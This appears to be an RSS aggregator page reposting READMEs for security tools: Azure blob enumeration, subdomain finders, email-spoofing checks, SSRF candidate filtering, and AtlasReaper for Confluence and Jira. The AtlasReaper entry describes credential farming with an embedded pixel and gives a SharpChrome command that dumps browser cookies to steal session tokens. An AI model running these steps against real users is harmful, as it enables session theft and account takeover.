FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Goblob - A Fast Enumeration Tool For Publicly Exposed Azure Storage Blobs

By: Zion3R


Goblob is a lightweight and fast enumeration tool designed to aid in the discovery of sensitive information exposed publicy in Azure blobs, which can be useful for various research purposes such as vulnerability assessments, penetration testing, and reconnaissance.

Warning. Goblob will issue individual goroutines for each container name to check in each storage account, only limited by the maximum number of concurrent goroutines specified in the -goroutines flag. This implementation can exhaust bandwidth pretty quickly in most cases with the default wordlist, or potentially cost you a lot of money if you're using the tool in a cloud environment. Make sure you understand what you are doing before running the tool.


Installation

go install github.com/Macmod/goblob@latest

Usage

To use goblob simply run the following command:

$ ./goblob <storageaccountname>

Where <storageaccountname> is the target storage account to enumerate public Azure blob storage URLs on.

You can also specify a list of storage account names to check:

$ ./goblob -accounts accounts.txt

By default, the tool will use a list of common Azure Blob Storage container names to construct potential URLs. However, you can also specify a custom list of container names using the -containers option. For example:

$ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt

The tool also supports outputting the results to a file using the -output option:

$ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt -output results.txt

If you want to provide accounts to test via stdin you can also omit -accounts (or the account name) entirely:

$ cat accounts.txt | ./goblob

Wordlists

Goblob comes bundled with basic wordlists that can be used with the -containers option:

Optional Flags

Goblob provides several flags that can be tuned in order to improve the enumeration process:

  • -goroutines=N - Maximum number of concurrent goroutines to allow (default: 5000).
  • -blobs=true - Report the URL of each blob instead of the URL of the containers (default: false).
  • -verbose=N - Set verbosity level (default: 1, min: 0, max: 3).
  • -maxpages=N - Maximum of container pages to traverse looking for blobs (default: 20, set to -1 to disable limit or to 0 to avoid listing blobs at all and just check if the container is public)
  • -timeout=N - Timeout for HTTP requests (seconds, default: 90)
  • -maxidleconns=N - MaxIdleConns transport parameter for HTTP client (default: 100)
  • -maxidleconnsperhost=N - MaxIdleConnsPerHost transport parameter for HTTP client (default: 10)
  • -maxconnsperhost=N - MaxConnsPerHost transport parameter for HTTP client (default: 0)
  • -skipssl=true - Skip SSL verification (default: false)
  • -invertsearch=true - Enumerate accounts for each container instead of containers for each account (default: false)

For instance, if you just want to find publicly exposed containers using large lists of storage accounts and container names, you should use -maxpages=0 to prevent the goroutines from paginating the results. Then run it again on the set of results you found with -blobs=true and -maxpages=-1 to actually get the URLs of the blobs.

If, on the other hand, you want to test a small list of very popular container names against a large set of storage accounts, you might want to try -invertsearch=true with -maxpages=0, in order to see the public accounts for each container name instead of the container names for each storage account.

You may also want to try changing -goroutines, -timeout and -maxidleconns, -maxidleconnsperhost and -maxconnsperhost and -skipssl in order to best use your bandwidth and find results faster.

Experiment with the flags to find what works best for you ;-)

Example

A fast enumeration tool for publicly exposed Azure Storage blobs. (6)

Contributing

Contributions are welcome by opening an issue or by submitting a pull request.

TODO

  • Check blob domain for NXDOMAIN before trying wordlist to save bandwidth (maybe)
  • Improve default parameters for better performance

Wordcloud

An interesting visualization of popular container names found in my experiments with the tool:


If you want to know more about my experiments and the subject in general, take a look at my article:



CloudPulse - AWS Cloud Landscape Search Engine

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:

  • IPs
  • subdomains
  • domains associated with a target
  • organization name
  • discover origin ips

1- Download CloudPulse :

git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/

2- Run docker compose :

docker-compose up -d

3- Run script.py script

docker-compose exec web python script.py

4 - Now go to http://:8000/search and enjoy the search engine

1- download CloudPulse :

git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/

2- Setup virtual environment :

python3 -m venv myenv
source myenv/bin/activate

3- Install requirements.txt file :

pip install -r requirements.txt

4- run an instance of elasticsearch using docker :

docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

5- update script.py and settings file to the host 'localhost':

#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
#se/settings.py

ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}

6- Run script.py to index data in elasticsearch:

python script.py

7- Run the app:

python manage.py runserver 0:8000

Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)

as an example searching for .mil data gives:

searching for tesla as en example gives :

CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



Mailchecker - Cross-language Temporary (Disposable/Throwaway) Email Detection Library. Covers 55 734+ Fake Email Providers

By: Zion3R


Cross-language email validation. Backed by a database of over 55 000 throwable email domains.

This will be very helpful when you have to contact your users and you want to avoid errors causing lack of communication or want to block "spamboxes".


Need to provide Webhooks inside your SaaS?

Need to embed a charts into an email?

It's over with Image-Charts, no more server-side rendering pain, 1 url = 1 chart.

https://image-charts.com/chart?
cht=lc // chart type
&chd=s:cEAELFJHHHKUju9uuXUc // chart data
&chxt=x,y // axis
&chxl=0:|0|1|2|3|4|5| // axis labels
&chs=873x200 // size

Use Image-Charts for free


Upgrade from 1.x to 3.x

Mailchecker public API has been normalized, here are the changes:

  • NodeJS/JavaScript: MailChecker(email) -> MailChecker.isValid(email)
  • PHP: MailChecker($email) -> MailChecker::isValid($email)
  • Python
import MailChecker
m = MailChecker.MailChecker()
if not m.is_valid('bla@example.com'):
# ...

became:

import MailChecker
if not MailChecker.is_valid('bla@example.com'):
# ...

MailChecker currently supports:


Usage

NodeJS

var MailChecker = require('mailchecker');

if(!MailChecker.isValid('myemail@yopmail.com')){
console.error('O RLY !');
process.exit(1);
}

if(!MailChecker.isValid('myemail.com')){
console.error('O RLY !');
process.exit(1);
}

JavaScript

<script type="text/javascript" src="MailChecker/platform/javascript/MailChecker.js"></script>
<script type="text/javascript">
if(!MailChecker.isValid('myemail@yopmail.com')){
console.error('O RLY !');
}

if(!MailChecker.isValid('myemail.com')){
console.error('O RLY !');
}
</script>

PHP

include __DIR__."/MailChecker/platform/php/MailChecker.php";

if(!MailChecker::isValid('myemail@yopmail.com')){
die('O RLY !');
}

if(!MailChecker::isValid('myemail.com')){
die('O RLY !');
}

Python

pip install mailchecker
# no package yet; just drop in MailChecker.py where you want to use it.
from MailChecker import MailChecker

if not MailChecker.is_valid('bla@example.com'):
print "O RLY !"

Django validator: https://github.com/jonashaag/django-indisposable

Ruby

require 'mail_checker'

unless MailChecker.valid?('myemail@yopmail.com')
fail('O RLY!')
end

Rust

 extern crate mailchecker;

assert_eq!(true, mailchecker::is_valid("plop@plop.com"));
assert_eq!(false, mailchecker::is_valid("\nok@gmail.com\n"));
assert_eq!(false, mailchecker::is_valid("ok@guerrillamailblock.com"));

Elixir

Code.require_file("mail_checker.ex", "mailchecker/platform/elixir/")

unless MailChecker.valid?("myemail@yopmail.com") do
raise "O RLY !"
end

unless MailChecker.valid?("myemail.com") do
raise "O RLY !"
end

Clojure

; no package yet; just drop in mailchecker.clj where you want to use it.
(load-file "platform/clojure/mailchecker.clj")

(if (not (mailchecker/valid? "myemail@yopmail.com"))
(throw (Throwable. "O RLY!")))

(if (not (mailchecker/valid? "myemail.com"))
(throw (Throwable. "O RLY!")))

Go

package main

import (
"log"

"github.com/FGRibreau/mailchecker/platform/go"
)

if !mail_checker.IsValid('myemail@yopmail.com') {
log.Fatal('O RLY !');
}

if !mail_checker.IsValid('myemail.com') {
log.Fatal("O RLY !")
}

Installation

Go

go get https://github.com/FGRibreau/mailchecker

NodeJS/JavaScript

npm install mailchecker

Ruby

gem install ruby-mailchecker

PHP

composer require fgribreau/mailchecker

We accept pull-requests for other package manager.

Data sources

TorVPN

  $('td', 'table:last').map(function(){
return this.innerText;
}).toArray();

BloggingWV

  Array.prototype.slice.call(document.querySelectorAll('.entry > ul > li a')).map(function(el){return el.innerText});

... please add your own dataset to list.txt.

Regenerate libraries from list.txt

Just run (requires NodeJS):

npm run build

Development

Development environment requires docker.

# install and setup every language dependencies in parallel through docker
npm install

# run every language setup in parallel through docker
npm run setup

# run every language tests in parallel through docker
npm test

Backers

Maintainers

These amazing people are maintaining this project:

Contributors

These amazing people have contributed code to this project:

Discover how you can contribute by heading on over to the CONTRIBUTING.md file.

Changelog



PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.Β 


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
Ò””Ò”€# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
url Enter the site URL

options:
-h, --help show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
Ò””Ò”€# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

Β 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW ITS SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



DakshSCRA - Source Code Review Assist

By: Zion3R


Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


Debut

Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

Features and Functionalities

Distinctive Features (Multiple World’s First)

  • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

  • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

  • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

  • Automated Scientific Effort Estimation for Code Review (World’s First): Providing a measurable approach for estimating efforts required for a code review process.

Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

Additionally, the tool offers the following functionalities:

  • Options to use platform-specific rules specific for finding areas of interests
  • Options to extend or add new rules for any new or existing languages
  • Generates report in text, HTML and PDF format for inspection

Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

Feel free to contribute towards updating or adding new rules and future development.

If you find any bugs, report them to d3basis.m0hanty@gmail.com.

Tool Setup

Pre-requisites

Python3 and all the libraries listed in requirements.txt

Setting up environment to run this tool

1. Setup a virtual environment

$ pip install virtualenv

$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv

$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate

After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

2. Ensure all required libraries are installed within the virtual environment

You must run the below command after activating the virtual environment as mentioned in the previous steps.

pip install -r requirements.txt

Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

Tool Usage

$ python3 dakshscra.py -h // To view avaialble options and arguments

usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review

Example Usage

$ python3 dakshscra.py // To view tool usage along with examples

Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshsca.py -r php -t /source_dir_path

# To override default settings, other filetypes can be specified with '-f' option.
dakshsca.py -r php -f dotnet -t /path_to_source_dir
dakshsca.py -r php -f custom -t /path_to_source_dir

# Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
dakshsca.py -recon -r php -t /path_to_source_dir

# Perform only reconnaissance if '-recon' used without the '-r' option.
dakshsca.py -recon -t /path_to_source_dir

# Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
dakshsca.py -r php -vv -t /path_to_source_dir


Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TY PES: dotnet, php, java, custom, allfiles

Reports

The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

Scanning (Areas of Security Concerns) Report

HTML Report:
  • DakshSCRA/reports/html/report.html
PDF Report:
  • DakshSCRA/reports/html/report.pdf
RAW TEXT Based Reports:
  • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
  • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
  • Identified Project Files: DakshSCRA/runtime/filepaths.txt

Reconnaissance (Recon) Report

  • Reconnaissance Summary: /reports/text/recon.txt

Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

Code Review Effort Estimation Report

  • Effort estimation report: /reports/html/estimation.html

Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



Nodesub - Command-Line Tool For Finding Subdomains In Bug Bounty Programs

By: Zion3R


Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.


Features

  • Perform subdomain enumeration using CIDR notation (Support input list).
  • Perform subdomain enumeration using ASN (Support input list).
  • Perform subdomain enumeration using a list of domains.

Installation

To install Nodesub, use the following command:

npm install -g nodesub

NOTE:

  • Edit File ~/.config/nodesub/config.ini

Usage

nodesub -h

This will display help for the tool. Here are all the switches it supports.

Examples
  • Enumerate subdomains for a single domain:

     nodesub -u example.com
  • Enumerate subdomains for a list of domains from a file:

     nodesub -l domains.txt
  • Perform subdomain enumeration using CIDR:

    node nodesub.js -c 192.168.0.0/24 -o subdomains.txt

    node nodesub.js -c CIDR.txt -o subdomains.txt

  • Perform subdomain enumeration using ASN:

    node nodesub.js -a AS12345 -o subdomains.txt
    node nodesub.js -a ASN.txt -o subdomains.txt
  • Enable recursive subdomain enumeration and output the results to a JSON file:

     nodesub -u example.com -r -o output.json -f json

Output

The tool provides various output formats for the results, including:

  • Text (txt)
  • JSON (json)
  • CSV (csv)
  • PDF (pdf)

The output file contains the resolved subdomains, failed resolved subdomains, or all subdomains based on the options chosen.



AtlasReaper - A Command-Line Tool For Reconnaissance And Targeted Write Operations On Confluence And Jira Instances

By: Zion3R

Β 


AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira. It also provides various features that can be helpful for tasks such as credential farming and social engineering. The tool is written in C#.


Blog post: Sowing Chaos and Reaping Rewards in Confluence and Jira

                                                   .@@@@
@@@@@
@@@@@ @@@@@@@
@@@@@ @@@@@@@@@@@
@@@@@ @@@@@@@@@@@@@@@
@@@@, @@@@ *@@@@
@@@@ @@@ @@ @@@ .@@@
_ _ _ ___ @@@@@@@ @@@@@@
/_\| |_| |__ _ __| _ \___ __ _ _ __ ___ _ _ @@ @@@@@@@@
/ _ \ _| / _` (_-< / -_) _` | '_ \/ -_) '_| @@ @@@@@@@@
/_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_| @@@@@@@@ &@
|_| @@@@@@@@@@ @@&
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@. @@
@werdhaihai

Usage

AtlasReaper uses commands, subcommands, and options. The format for executing commands is as follows:

.\AtlasReaper.exe [command] [subcommand] [options]

Replace [command], [subcommand], and [options] with the appropriate values based on the action you want to perform. For more information about each command or subcommand, use the -h or --help option.

Below is a list of available commands and subcommands:

Commands

Each command has sub commands for interacting with the specific product.

  • confluence
  • jira

Subcommands

Confluence

  • confluence attach - Attach a file to a page.
  • confluence download - Download an attachment.
  • confluence embed - Embed a 1x1 pixel image to perform farming attacks.
  • confluence link - Add a link to a page.
  • confluence listattachments - List attachments.
  • confluence listpages - List pages in Confluence.
  • confluence listspaces - List spaces in Confluence.
  • confluence search - Search Confluence.

Jira

  • jira addcomment - Add a comment to an issue.
  • jira attach - Attach a file to an issue.
  • jira createissue - Create a new issue.
  • jira download - Download attachment(s) from an issue.
  • jira listattachments - List attachments on an issue.
  • jira listissues - List issues in Jira.
  • jira listprojects - List projects in Jira.
  • jira listusers - List Atlassian users.
  • jira searchissues - Search issues in Jira.

Common Commands

  • help - Display more information on a specific command.

Examples

Here are a few examples of how to use AtlasReaper:

  • Search for a keyword in Confluence with wildcard search:

    .\AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

  • Attach a file to a page in Confluence:

    .\AtlasReaper.exe confluence attach --page-id "12345" --file "C:\path\to\file.exe" --url $url --cookie $cookie

  • Create a new issue in Jira:

    .\AtlasReaper.exe jira createissue --project "PROJ" --issue-type Task --message "I can't access this link from my host" --url $url --cookie $cookie

Authentication

Confluence and Jira can be configured to allow anonymous access. You can check this by supplying omitting the -c/--cookie from the commands.

In the event authentication is required, you can dump cookies from a user's browser with SharpChrome or another similar tool.

  1. .\SharpChrome.exe cookies /showall

  2. Look for any cookies scoped to the *.atlassian.net named cloud.session.token or tenant.session.token

Limitations

Please note the following limitations of AtlasReaper:

  • The tool has not been thoroughly tested in all environments, so it's possible to encounter crashes or unexpected behavior. Efforts have been made to minimize these issues, but caution is advised.
  • AtlasReaper uses the cloud.session.token or tenant.session.token which can be obtained from a user's browser. Alternatively, it can use anonymous access if permitted. (API tokens or other auth is not currently supported)
  • For write operations, the username associated with the user session token (or "anonymous") will be listed.

Contributing

If you encounter any issues or have suggestions for improvements, please feel free to contribute by submitting a pull request or opening an issue in the AtlasReaper repo.



Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

By: Zion3R


surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending a HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.

Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.


Installation

This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.

It can be installed with the following command:

go install github.com/assetnote/surf/cmd/surf@latest

Usage

Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x

The full list of settings can be found below:

❯ surf -h

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•” β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β•

by shubs @ assetnote

Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

Options:
--hosts FILE, -l FILE
List of assets (hosts or subdomains)
--concurrency CONCURRENCY, -c CONCURRENCY
Threads (passed down to httpx) - default 100 [default: 100]
--timeout SECONDS, -t SECONDS
Timeout in seconds (passed down to httpx) - default 3 [default: 3]
--retries RETRIES, -r RETRIES
Retries on failure (passed down to httpx) - default 2 [default: 2]
--disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
--disableanalysis, -d
Disable analysis and only output list of hosts - default false [default: false]
--help, -h display this help and exit

Output

When running surf, it will print out the SSRF candidates to stdout, but it will also save two files inside the folder it is ran from:

  • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
  • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

Acknowledgements

Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

By: Zion3R


xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


Features

  • Fetches domains from curated passive sources to maximize results.

  • Supports stdin and stdout for easy integration into workflows.

  • Cross-Platform (Windows, Linux & macOS).

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xsubfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xsubfind3r.git 
  • Build the utility

     cd xsubfind3r/cmd/xsubfind3r && \
    go build .
  • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.3.0
sources:
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
chaos:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
fullhunt:
- 0d9652ce-516c-4315-b589-9b241ee6dc24
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xsubfind3r use the -h flag:

xsubfind3r -h

help message:


_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
